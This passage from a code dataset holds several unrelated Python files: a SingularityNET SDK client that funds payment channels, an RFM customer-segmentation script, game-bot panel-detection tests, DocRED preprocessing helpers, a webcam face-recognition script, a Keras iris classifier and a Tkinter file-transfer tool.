_service_id = service_id\n _channel_id = channel_id\n\n if len(args) == 2:\n (_org_id, _service_id) = args\n if len(args) == 1:\n raise ValueError(\"Please either provide both organization id and service id as positional arguments or none of them\")\n\n if (_org_id is not None or _service_id is not None) and (org_id is not None or service_id is not None):\n raise ValueError(\"Please provide organization id and service id either as positional arguments or as keyword arguments\")\n \n if org_id is not None and _service_id is not None:\n _org_id = org_id\n _service_id = service_id\n\n if _org_id is None or _service_id is None:\n raise ValueError(\"\"\"Could not instantiate client.\n Please provide at least an org_id and a service_id either as positional or keyword arguments\"\"\")\n\n\n # Get client metadata for service\n (found, registration_id, metadata_uri, tags) = self.registry_contract.functions.getServiceRegistrationById(bytes(_org_id, \"utf-8\"), bytes(_service_id, \"utf-8\")).call()\n client.metadata = AttributeDict(json.loads(self.ipfs_client.cat(metadata_uri.rstrip(b\"\\0\").decode('ascii')[7:])))\n default_group = AttributeDict(client.metadata.groups[0])\n client.default_payment_address = default_group[\"payment_address\"]\n default_channel_value = client.metadata.pricing[\"price_in_cogs\"]*100\n default_channel_expiration = int(self.web3.eth.getBlock(\"latest\").number + client.metadata.payment_expiration_threshold + (3600*24*7/self.average_block_time))\n service_endpoint = None\n for endpoint in client.metadata[\"endpoints\"]:\n if (endpoint[\"group_name\"] == default_group[\"group_name\"]):\n service_endpoint = endpoint[\"endpoint\"]\n break\n\n\n # Functions to get a funded channel with a combination of calls to the blockchain and to the daemon \n grpc_channel = self._get_base_grpc_channel(service_endpoint)\n\n channel_state_service_proto_path = str(cur_dir.joinpath(\"resources\", \"proto\"))\n 
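# make the generated state-service stubs importable by bare module name, then restore sys.path\n        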
sys.path.insert(0, channel_state_service_proto_path)\n        _state_service_pb2 = importlib.import_module(\"state_service_pb2\")\n        _state_service_pb2_grpc = importlib.import_module(\"state_service_pb2_grpc\")\n        sys.path.remove(channel_state_service_proto_path)\n\n\n        def _get_channel_state(channel_id):\n            stub = _state_service_pb2_grpc.PaymentChannelStateServiceStub(grpc_channel)\n            message = web3.Web3.soliditySha3([\"uint256\"], [channel_id])\n            signature = self.web3.eth.account.signHash(defunct_hash_message(message), self.signer_private_key).signature\n            request = _state_service_pb2.ChannelStateRequest(channel_id=web3.Web3.toBytes(channel_id), signature=bytes(signature))\n            response = stub.GetChannelState(request)\n            return {\n                \"current_nonce\": int.from_bytes(response.current_nonce, byteorder=\"big\"),\n                \"current_signed_amount\": int.from_bytes(response.current_signed_amount, byteorder=\"big\")\n            }\n\n\n        def _get_channel_states():\n            return [dict(_get_channel_state(channel.channelId), **{\"channel_id\": channel.channelId, \"initial_amount\": channel.amount, \"expiration\": channel.expiration}) for channel in self._get_channels(client.default_payment_address)]\n\n\n        def _client_open_channel(value, expiration):\n            mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n            group_id = base64.b64decode(default_group.group_id)\n            if value > mpe_balance:\n                return self.mpe_deposit_and_open_channel(default_group.payment_address, group_id, value - mpe_balance, expiration)\n            else:\n                return self.mpe_open_channel(default_group.payment_address, group_id, value, expiration)\n\n\n        def _client_add_funds(channel_id, amount):\n            mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n            if amount > mpe_balance:  # was `value`, an undefined name in this scope\n                self.mpe_deposit(amount - mpe_balance)\n            return self.mpe_channel_add_funds(channel_id, amount)\n\n\n        def _client_extend_and_add_funds(channel_id, new_expiration, amount):\n            mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n            if amount > mpe_balance:\n                self.mpe_deposit(amount - mpe_balance)\n            return self.mpe_channel_extend_and_add_funds(channel_id, new_expiration, amount)\n\n\n        def _get_funded_channel():\n            channel_states = _get_channel_states()\n\n            if len(channel_states) == 0:\n                if self.allow_transactions is False:\n                    raise RuntimeError('No state channel found. Please open a new channel or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n                else:\n                    _client_open_channel(default_channel_value, default_channel_expiration)\n                    channel_states = _get_channel_states()\n\n            funded_channels = list(filter(lambda state: state[\"initial_amount\"] - state[\"current_signed_amount\"] >= int(client.metadata.pricing[\"price_in_cogs\"]), iter(channel_states)))\n            if len(funded_channels) == 0:\n                if self.allow_transactions is True:\n                    non_expired_unfunded_channels = list(filter(lambda state: state[\"expiration\"] + client.metadata.payment_expiration_threshold > self.web3.eth.getBlock(\"latest\").number, iter(channel_states)))\n                    if len(non_expired_unfunded_channels) == 0:\n                        channel_id = next(iter(channel_states))[\"channel_id\"]\n                        _client_extend_and_add_funds(channel_id, default_channel_expiration, default_channel_value)\n                        return channel_id\n                    else:\n                        channel_id = next(iter(non_expired_unfunded_channels))[\"channel_id\"]\n                        _client_add_funds(channel_id, default_channel_value)\n                        return channel_id\n                else:\n                    raise RuntimeError('No funded channel found. 
Please open a new channel or fund an open one, or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n\n valid_channels = list(filter(lambda state: state[\"expiration\"] + client.metadata.payment_expiration_threshold > self.web3.eth.getBlock(\"latest\").number, iter(funded_channels)))\n if len(valid_channels) == 0:\n if self.allow_transactions is True:\n channel_id = next(iter(funded_channels))[\"channel_id\"]\n self.mpe_channel_extend(channel_id, default_channel_expiration)\n return channel_id\n else:\n raise RuntimeError('No non-expired channel found. Please open a new channel or extend an open and funded one, or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n else:\n channel_id = next(iter(valid_channels))[\"channel_id\"]\n\n return channel_id\n\n\n if _channel_id is None:\n _channel_id = _get_funded_channel() \n\n\n # Import modules and add them to client grpc object\n libraries_base_path = self.libraries_base_path\n\n client_library_path = str(main_dir_path.joinpath(self.libraries_base_path, _org_id, _service_id))\n sys.path.insert(0, client_library_path)\n\n grpc_modules = []\n for module_path in Path(client_library_path).glob(\"**/*_pb2.py\"):\n grpc_modules.append(module_path)\n for module_path in Path(client_library_path).glob(\"**/*_pb2_grpc.py\"):\n grpc_modules.append(module_path)\n\n grpc_modules = list(map(\n lambda x: str(PurePath(Path(x).relative_to(client_library_path).parent.joinpath(PurePath(x).stem))),\n grpc_modules\n ))\n\n imported_modules = MutableAttributeDict({})\n for grpc_module in grpc_modules:\n imported_module = importlib.import_module(grpc_module)\n imported_modules[grpc_module] = imported_module\n\n sys.path.remove(client_library_path)\n\n\n # Service channel utility methods\n def _get_service_call_metadata(channel_id):\n state = _get_channel_state(channel_id)\n amount = state[\"current_signed_amount\"] + int(client.metadata.pricing[\"price_in_cogs\"])\n message = web3.Web3.soliditySha3(\n [\"address\", \"uint256\", \"uint256\", \"uint256\"],\n [self.mpe_contract.address, channel_id, state[\"current_nonce\"], amount]\n )\n signature = bytes(self.web3.eth.account.signHash(defunct_hash_message(message), self.signer_private_key).signature)\n metadata = [\n (\"snet-payment-type\", \"escrow\"),\n (\"snet-payment-channel-id\", str(channel_id)),\n (\"snet-payment-channel-nonce\", str(state[\"current_nonce\"])),\n (\"snet-payment-channel-amount\", str(amount)),\n (\"snet-payment-channel-signature-bin\", signature)\n ]\n\n return metadata\n\n\n # Client exports\n client.open_channel = lambda value=default_channel_value, expiration=default_channel_expiration: _client_open_channel(value, expiration)\n client.get_service_call_metadata = lambda: _get_service_call_metadata(_channel_id)\n client.grpc = imported_modules\n\n def intercept_call(client_call_details, request_iterator, request_streaming,\n response_streaming):\n metadata = []\n if client_call_details.metadata is not None:\n metadata = list(client_call_details.metadata)\n metadata.extend(client.get_service_call_metadata())\n client_call_details = _ClientCallDetails(\n client_call_details.method, client_call_details.timeout, metadata,\n client_call_details.credentials)\n return client_call_details, request_iterator, None\n\n client.grpc_channel = grpc.intercept_channel(grpc_channel, generic_client_interceptor.create(intercept_call))\n\n\n return client 
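 # the client bundles grpc stubs, an intercepted channel and payment-metadata helpers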
\n","sub_path":"snet_sdk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"248438415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 8 23:29:53 2020\n\n@author: USER\n\"\"\"\n\nimport pandas as pd \nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime as dt\n\n\ndf_tr = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='Transactions')\ndf_nc = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='NewCustomerList')\ndf_cd = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='CustomerDemographic')\ndf_ca = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='CustomerAddress')\n\n#df_tr.describe()\n#df_cd.columns\n\nrfm_data=df_tr[['customer_id','transaction_date','Profit']]\n\n\nrfm_data['transaction_date'] = pd.to_datetime(rfm_data['transaction_date'])\n\n\n\n#For Monetary, Calculate sum of purchase price for each customer\n\n#rfm_data.groupby(['customer_id']).groups.keys()\n#rfm_data.groupby(['customer_id']).first()\ndf_profit=rfm_data.groupby(['customer_id'])['Profit'].sum()\n\n\n#For Frequency, Calculate the number of orders for each customer\ndf_l=df_tr.groupby(['customer_id'])['customer_id'].count().reset_index(drop=True)\ndf_l=pd.DataFrame(df_l)\ndf_profit=df_profit.reset_index()\ndf_profit=df_profit.merge(df_l, left_index=True, right_index=True, how='outer')\n\n#For Recency, Calculate the number of days between present date and\n# date of last purchase each customer\n\ndf_recency=rfm_data.groupby(['customer_id'])['transaction_date'].max()\ndf_recency=df_recency.reset_index()\nPRESENT = dt.date.today()\ndf_recency.transaction_date= pd.to_datetime(df_recency.transaction_date) \nPRESENT=pd.to_datetime(PRESENT)\n\ndf_recency.transaction_date=(PRESENT-df_recency.transaction_date)\ndf_recency.transaction_date=df_recency.transaction_date.astype(str)\ndf_recency.transaction_date = df_recency.transaction_date.apply(lambda x: int(x.split(' ')[0]))\ndf_recency.transaction_date=df_recency.transaction_date.astype(int)\n\nrfm=df_profit.merge(df_recency['transaction_date'], left_index=True, right_index=True, how='outer')\n\n#Form the RFM dataframe to analyse further\nrfm = rfm.rename(columns = {'customer_id_x': 'CustomerID', 'Profit': 'Monetary','customer_id_y': 'Frequency','transaction_date': 'Recency'}, inplace = False)\n\n#Calculate RFM score\nrfm['M'] = pd.qcut(rfm['Monetary'], 4, ['1','2','3','4'])\nrfm['F'] = pd.qcut(rfm['Frequency'], 4, ['1','2','3','4'])\nrfm['R'] = pd.qcut(rfm['Recency'], 4, ['4','3','2','1'])\n\nrfm['RFM_Segment'] = rfm.R.astype(str)+ rfm.F.astype(str) + rfm.M.astype(str)\nrfm.R=rfm.R.astype(int)\nrfm.F=rfm.F.astype(int)\nrfm.M=rfm.M.astype(int)\nrfm['RFM_Score'] = rfm[['R','F','M']].sum(axis=1)\nprint(rfm['RFM_Score'].unique())\nprint(rfm['RFM_Segment'].unique())\n\n\n# Define rfm_level function\ndef rfm_level(rfm):\n if (rfm['RFM_Segment'] >= 434 or (rfm['RFM_Score'] >= 9)) :\n return 'Platinum customers'\n elif ((rfm['RFM_Score'] >= 8) and (rfm['M'] == 4)):\n return 'Champions Big Spenders'\n elif ((rfm['RFM_Score'] >= 6) and (rfm['F'] >= 2)):\n return 'Loyal Customers'\n elif ((rfm['RFM_Segment'] >= 221) or (rfm['RFM_Score'] >= 6)):\n return 'Potential Loyalists'\n elif (((rfm['RFM_Segment'] >= 121) and (rfm['R'] == 1)) or rfm['RFM_Score'] == 5):\n return 'Needs Attention'\n elif ((rfm['RFM_Score'] >= 4) and (rfm['R'] == 1)):\n return 'Hibernating customers'\n 
else:\n return 'Lost Customers'\n \n# Define rfm_level function\ndef rfm_action(df):\n if (df['RFM_Segment'] >= 434 or (df['RFM_Score'] >= 9)) :\n return 'No Price Incentives; Offer Limited edition and Loyality programs'\n elif ((df['RFM_Score'] >= 8) and (df['M'] == 4)):\n return 'Upsell most expensive items'\n elif ((df['RFM_Score'] >= 6) and (df['F'] >= 2)):\n return 'Loyality programs;Cross Sell'\n elif ((df['RFM_Segment'] >= 221) or (df['RFM_Score'] >= 6)):\n return 'Cross Sell Recommendations and Discount coupons'\n elif (((df['RFM_Segment'] >= 121) and (df['R'] == 1)) or df['RFM_Score'] == 5):\n return 'Price incentives and Limited time offer'\n elif ((df['RFM_Score'] >= 4) and (df['R'] == 1)):\n return 'Aggressive price incentives'\n else:\n return 'Don\\'t spend too much trying to re-acquire'\n \n \n# Create a new variable RFM_Level\nrfm['RFM_Segment'] = rfm.RFM_Segment.apply(lambda x: int(x))\nrfm['Customer Segment'] = rfm.apply(rfm_level, axis=1)\n# Create a new variable RFM_Level\nrfm['Marketing Action'] = rfm.apply(rfm_action, axis=1)\n\n\n# Calculate average values for each Customer Segment, and return a size of each segment \nrfm_level_agg = rfm.groupby('Customer Segment').agg({\n 'Recency': 'mean',\n 'Frequency': 'mean',\n 'Monetary': ['mean', 'count'],\n 'Marketing Action': 'unique'\n}).round(1)\n# Print the aggregated dataset\nprint(rfm_level_agg)\n\nrfm_level_ag = pd.DataFrame(rfm_level_agg)\nrfm_level_ag = rfm_level_ag.reset_index()\nrfm_level_ag\n\n\n\n\n\n\n","sub_path":"KPMG/model_building.py","file_name":"model_building.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8048361","text":"\"\"\"\ntest_panels.py\n\nTest any functionality related to the image search functionality relating to the panels within the game.\n\nPanels in the game are represented by the six buttons available at the bottom most portion of the game,\nthese panels house basically all the functionality within the game. 
The goal of these tests is to ensure\nthat the image searching and methods available on the bot can determine what state the game is in at all times.\n\"\"\"\nfrom settings import TEST_CONFIG_FILE, TEST_STATS_FILE\nfrom titanbot.tt2.core.bot import Bot\nfrom titanbot.tt2.core.maps import IMAGES as BOT_IMAGES\nfrom titanbot.tt2.tests.maps import IMAGES as TEST_IMAGES\n\nfrom PIL import Image\nimport unittest\n\n\nclass TestPanelBotMethods(unittest.TestCase):\n \"\"\"Test functionality related to in-game panels here.\"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"Initialize the test case with a Bot instance for testing purposes.\"\"\"\n cls.bot = Bot(TEST_CONFIG_FILE, TEST_STATS_FILE)\n\n def test_any_panels_on_screen(self):\n \"\"\"Test that the bot can determine if any panels are currently on the screen or not.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n exit_panel = BOT_IMAGES[\"GENERIC\"][\"exit_panel\"]\n\n # These images should contain the \"exit_panel\" image when checked.\n true = (\n images[\"artifacts_collapsed\"], images[\"artifacts_expanded\"], images[\"equipment_collapsed\"],\n images[\"equipment_expanded\"], images[\"heroes_collapsed\"], images[\"heroes_expanded\"],\n images[\"master_collapsed\"], images[\"master_expanded\"], images[\"pets_collapsed\"],\n images[\"pets_expanded\"], images[\"shop_open\"],\n )\n # These images should not contain the \"exit_panel\" image when checked.\n false = (\n images[\"no_panel_open\"],\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(exit_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(exit_panel, bool_only=True, testing=True))\n\n def test_panel_collapse_on_screen(self):\n \"\"\"Test that the bot can determine if the collapse button is present on the screen.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n collapse_panel = BOT_IMAGES[\"GENERIC\"][\"collapse_panel\"]\n\n # These images should contain the \"collapse_panel\" image when checked.\n true = (\n images[\"artifacts_expanded\"], images[\"equipment_expanded\"], images[\"heroes_expanded\"],\n images[\"master_expanded\"], images[\"pets_expanded\"],\n )\n # These images should not contain the \"collapse_panel\" image when checked.\n false = (\n images[\"artifacts_collapsed\"], images[\"equipment_collapsed\"], images[\"heroes_collapsed\"],\n images[\"master_collapsed\"], images[\"no_panel_open\"], images[\"shop_open\"],\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(collapse_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(collapse_panel, bool_only=True, testing=True))\n\n def test_panel_expand_on_screen(self):\n \"\"\"Test that the bot can determine if the expand button is present on the screen.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n expand_panel = BOT_IMAGES[\"GENERIC\"][\"expand_panel\"]\n\n # These images should contain the \"expand_panel\" image when checked.\n true = (\n images[\"artifacts_collapsed\"], images[\"equipment_collapsed\"], images[\"heroes_collapsed\"],\n images[\"master_collapsed\"],\n )\n # These images should not contain the \"expand_panel\" image when checked.\n false = (\n images[\"artifacts_expanded\"], 
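# expanded panels show the collapse arrow, not the expand arrow\n            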
images[\"equipment_expanded\"], images[\"heroes_expanded\"],\n images[\"master_expanded\"], images[\"pets_expanded\"], images[\"no_panel_open\"],\n images[\"shop_open\"]\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(expand_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(expand_panel, bool_only=True, testing=True))\n\n def test_panel_buy_options(self):\n \"\"\"Test that the bot can determine if the different buy option buttons are present on the screen.\"\"\"\n images = (\n TEST_IMAGES[\"PANELS\"][\"master_buy_option_open_collapsed\"],\n TEST_IMAGES[\"PANELS\"][\"master_buy_option_open_collapsed\"],\n )\n\n # These images should all be present in the images above.\n buy_options = (\n BOT_IMAGES[\"GENERIC\"][\"buy_max\"], BOT_IMAGES[\"GENERIC\"][\"buy_one\"],\n BOT_IMAGES[\"GENERIC\"][\"buy_one_hundred\"], BOT_IMAGES[\"GENERIC\"][\"buy_ten\"],\n BOT_IMAGES[\"GENERIC\"][\"max\"],\n )\n\n for path in images:\n image = Image.open(path)\n self.bot.grabber.current = image\n for find in buy_options:\n self.assertTrue(self.bot.grabber.search(find, bool_only=True, testing=True))\n","sub_path":"titanbot/tt2/tests/test_panels.py","file_name":"test_panels.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"608151270","text":"import json\nimport numpy as np\n\ndata_dir = 'E:/workspace/repo/DocRED/code/prepro_data/'\n\n\ndef get_dist(h_vertex, t_vertex):\n min_d = 620\n for h_m in h_vertex:\n for t_m in t_vertex:\n d = abs(h_m['pos'][0] - t_m['pos'][0])\n min_d = min(min_d, d)\n return min_d\n\n\ndef number_of_pos_neg_triplets():\n from collections import defaultdict\n for split in ['train', 'dev', 'test']:\n counter = 0\n all_counter = 0\n for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n labels = defaultdict(list)\n for label in ex['labels']:\n labels[(label['h'], label['t'])].append(label['r'])\n counter += len(labels)\n all_counter += (len(ex['vertexSet'])*(len(ex['vertexSet'])-1))\n\n print(f\"{split}: all: {all_counter}, pos: {counter}, neg: {all_counter-counter}\")\n\n\ndef sent_avg_len():\n sent_lens = []\n for split in ['train', 'dev', 'test']:\n for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n sent_lens.extend([len(sent) for sent in ex['sents']])\n print(np.mean(sent_lens)) # 24.88\n\n\ndef coref_short_proportion():\n true_file = json.load(open(data_dir+f\"dev_train.json\"))\n all_counter = 0\n coref = [0]*2\n dist = [0]*2\n for idx, ins in enumerate(true_file):\n vertexSet = ins['vertexSet']\n for label in ins['labels']:\n key = f\"{idx}_{label['h']}_{label['t']}\"\n if len(vertexSet[label['h']]) > 1 or len(vertexSet[label['t']]) > 1:\n coref[0] += 1\n else:\n coref[1] += 1\n if 0 <= get_dist(vertexSet[label['h']], vertexSet[label['t']]) <= 25:\n dist[0] += 1\n else:\n dist[1] += 1\n all_counter += 1\n\n print(f\"all: {all_counter}, {coref[0]/float(all_counter)}({coref[0]}/{all_counter})\")\n print(f\"all: {all_counter}, {dist[0]/float(all_counter)}({dist[0]}/{all_counter})\")\n # dev\n # all: 12323, 0.5931185587925019(7309/12323) 60% have co-references\n # all: 12323, 0.6469203927615029(7972/12323) 65% short; 35% long distance\n # train\n # all: 38180, 0.5930330015715034(22642/38180) 60%\n # all: 38180, 0.639732844421163(24425/38180) 64%\n\n\ndef 
entity_type_combinations():\n h_t_entity_type_combs = set()\n for split in ['train', 'dev']:\n data = json.load(open(f\"{data_dir}dev_{split}.json\"))\n for ex in data:\n v = ex['vertexSet']\n for label in ex['labels']:\n h_idx, t_idx = label['h'], label['t']\n for h_m in v[h_idx]:\n for t_m in v[t_idx]:\n h_t_entity_type_combs.add((h_m['type'], t_m['type']))\n h_t_entity_type_combs = list(map(list, h_t_entity_type_combs))\n print(len(h_t_entity_type_combs))\n json.dump(h_t_entity_type_combs, open(f'{data_dir}DocRED_h_t_entity_type_combs_{len(h_t_entity_type_combs)}.json', 'w'), indent=2)\n\n\nentity_type_combinations()\n# num_vertex = []\n# for split in ['train', 'dev', 'test']:\n# for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n# num_vertex.append(len(ex['vertexSet']))\n#\n# print(f\"avg: {np.mean(num_vertex)}\")\n\n# number_of_pos_neg_triplets()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pre-processing/DocRED/gen_data_DocRED.py","file_name":"gen_data_DocRED.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"74132277","text":"import numpy as np\nimport cv2\nimport pickle\n\nface_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read(\"trainer.yml\")\n\nlabels = {\"person_name\": 0}\nwith open(\"labels.pickle\", 'rb') as f:\n oglabels = pickle.load(f)\n labels = {v:k for k,v in oglabels.items()}\n\ncap = cv2.VideoCapture(0)\n\ndef rescale_frame(frame, percent=50):\n width = int(frame.shape[1] * percent/ 100)\n height = int(frame.shape[0] * percent/ 100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n\n\nwhile True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n for(x, y, w, h) in faces:\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n\n id_, conf = recognizer.predict(roi_gray)\n if conf>=55:\n print(labels[id_])\n font = cv2.FONT_HERSHEY_SIMPLEX\n name = labels[id_]\n color = (255, 255, 255)\n stroke = 1\n cv2.putText(frame, name, (x,y), font, 1, color, stroke, cv2.LINE_AA)\n\n img_item = 'my-image.png'\n cv2.imwrite(img_item, roi_gray)\n\n color = (255, 0, 0)\n stroke = 2\n width = x + w\n height = y + h\n cv2.rectangle(frame, (x, y), (width, height), color, stroke)\n\n frame50 = rescale_frame(frame, percent=75)\n cv2.imshow('frame', frame50)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"176672318","text":"import tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn import datasets\niris=datasets.load_iris()\nX=iris.data\ny=iris.target\nimport pandas as pd\ndf_features= pd.DataFrame(X)\ndf_features\ndf_target= pd.DataFrame(y)\ndf_target\n\nfrom sklearn.model_selection import train_test_split\n#split train test dataset\nX_train, X_test, y_train, y_test=train_test_split(X,y,test_size=0.2)\n\n#report folder\nif (not(os.path.isdir(\"report\"))):\n os.mkdir(\"report\")\n\n# Define Sequential model with 3 layers\nmodel = keras.Sequential(\n [\n layers.Dense(4, activation=\"relu\", name=\"layer1\"),\n 
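# two small ReLU hidden layers; iris has 4 input features and 3 classes\n        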
layers.Dense(3, activation=\"relu\", name=\"layer2\"),\n        layers.Dense(3, name=\"layer3\", activation=\"softmax\"),  # iris has 3 classes; a single sigmoid unit cannot represent them\n    ]\n)\n\n# compile model\nloss_fn = tf.keras.losses.sparse_categorical_crossentropy  # matches the integer class labels; MSE on class ids is not a classification loss\nopt = keras.optimizers.Adam(learning_rate=0.01)\nmodel.compile(optimizer=opt, loss=loss_fn)\nhistory = model.fit(X_train, y_train, epochs=100, verbose=2)\n\n# printing summary\nfstructure = open(\"report/structure.txt\", \"w\")\nmodel.summary(print_fn=lambda x: fstructure.write(x + '\\n'))\nfstructure.close()\n\n# evaluation\nlosses = history.history['loss']\nepochs = history.epoch\n\nplt.plot(epochs, losses)\nplt.xlabel(\"epochs\")\nplt.ylabel('losses')\nplt.title('Loss per Epoch')\nplt.savefig('report/history.png')  # save before show(); show() flushes the current figure\nplt.show()\nfmetrics = open(\"report/metrics.txt\", \"w\")\nfmetrics.write('Initial loss value : ' + str(losses[0]) + \"\\n\")\nfmetrics.write('Final loss value : ' + str(losses[-1]))\nfmetrics.close()\n\n# saving\nmodel.save('report/weights.h5')\n","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"405640465","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport shutil, os, glob, time, datetime, sqlite3\nfrom datetime import timedelta\n\n\nclass FileCheck:\n    \"\"\"Small Tk app that moves recently modified .txt files between two folders.\"\"\"\n\n    def __init__(self, master):\n        # configure the master window\n        self.master = master\n        self.master.minsize(500, 300)  # minsize takes (width, height)\n        self.master.title(\"File Transfer\")\n        self.master.configure(background=\"lightblue\")\n\n        self.t1 = StringVar()\n        self.t2 = StringVar()\n        self.t3 = StringVar()\n\n        self.button1 = ttk.Button(self.master, text=\"Folder to update daily from.\", width=30,\n                                  command=self.inputFolder)\n        self.button1.pack()\n        self.txt1 = ttk.Entry(self.master, width=50, textvariable=self.t1).pack()\n\n        self.button2 = ttk.Button(self.master, text=\"Folder to update daily to\", width=30,\n                                  command=self.outputFolder)\n        self.button2.pack()\n        self.txt2 = ttk.Entry(self.master, width=50, textvariable=self.t2).pack()\n\n        self.button3 = ttk.Button(self.master, text=\"Transfer everything modified in the past 24 hours\",\n                                  width=50, command=self.transfer)\n        self.button3.pack()\n        self.Label = ttk.Label(text=\"Last File Check time\")\n        self.txt3 = ttk.Entry(self.master, width=50, textvariable=self.t3).pack()\n\n    def inputFolder(self):\n        folderInput = filedialog.askdirectory()\n        print(\"folderInput: {}\".format(folderInput))\n        self.t1.set(folderInput)\n\n    def outputFolder(self):\n        folderOutput = filedialog.askdirectory()\n        print(\"folderOutput: {}\".format(folderOutput))\n        self.t2.set(folderOutput)\n\n    def transfer(self):\n        fileFrom = self.t1.get()\n        fileTo = self.t2.get()\n        today1 = datetime.datetime.today()\n        last24Hours = today1 - timedelta(hours=24)  # compare datetimes, not formatted strings\n\n        for file in glob.glob(os.path.join(fileFrom, '*.txt')):\n            modifiedDate = datetime.datetime.fromtimestamp(os.path.getmtime(file))\n            if modifiedDate > last24Hours:\n                shutil.move(file, fileTo)\n        self.t3.set(today1)\n        dbToday = time.time()\n        print(\"dbToday: {}\".format(dbToday))\n        
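# log this run's epoch timestamp to SQLite so the next launch can report it\n        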
self.data_entry(dbToday)  # pass the timestamp in rather than using a global\n\n    def create_table(self):\n        conn = sqlite3.connect('transfersDate.db')\n        with conn:\n            conn.execute(\"CREATE TABLE IF NOT EXISTS date (time REAL)\")\n        conn.close()\n\n    def data_entry(self, dbToday):\n        self.create_table()  # make sure the table exists before inserting\n        conn = sqlite3.connect('transfersDate.db')\n        with conn:\n            # parameters must be a sequence: (dbToday,) rather than a bare float\n            conn.execute(\"INSERT INTO date (time) VALUES (?)\", (dbToday,))\n        conn.close()\n\n\ndef main():\n    root = Tk()\n    App = FileCheck(root)\n    root.mainloop()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"PyDrill_db_34_idle.py","file_name":"PyDrill_db_34_idle.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"51197542","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON 